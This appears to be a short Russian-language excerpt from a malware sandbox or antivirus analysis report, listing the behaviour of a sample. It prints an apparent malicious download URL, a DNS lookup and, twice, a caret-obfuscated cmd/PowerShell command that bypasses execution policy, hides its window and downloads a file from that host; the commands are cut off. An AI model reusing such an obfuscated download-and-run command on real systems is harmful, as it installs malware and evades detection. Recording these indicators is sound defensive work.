Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OW^eR^sHe^l^l.EX^E -^ExECuT^i^oN^PO^lIc^Y ^bYP^a^s^s ^-NoPRofIlE -^WINDowstYLE^ Hidde^n (nEW-o^bJEC^t SysT^EM^.N^Et^.^WEBCL^Ient).^DO^wNlO^A^dF^iLe('http://transporingsytw.wang...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "p^OW^eR^sHe^l^l.EX^E -^ExECuT^i^oN^PO^lIc^Y ^bYP^a^s^s ^-NoPRofIlE -^WINDowstYLE^ Hidde^n (nEW-o^bJEC^t SysT^EM^.N^Et^.^WEBCL^Ient).^DO^wNlO^A^dF^iLe('http://transporingsytw.wang...' (со скрытым окном)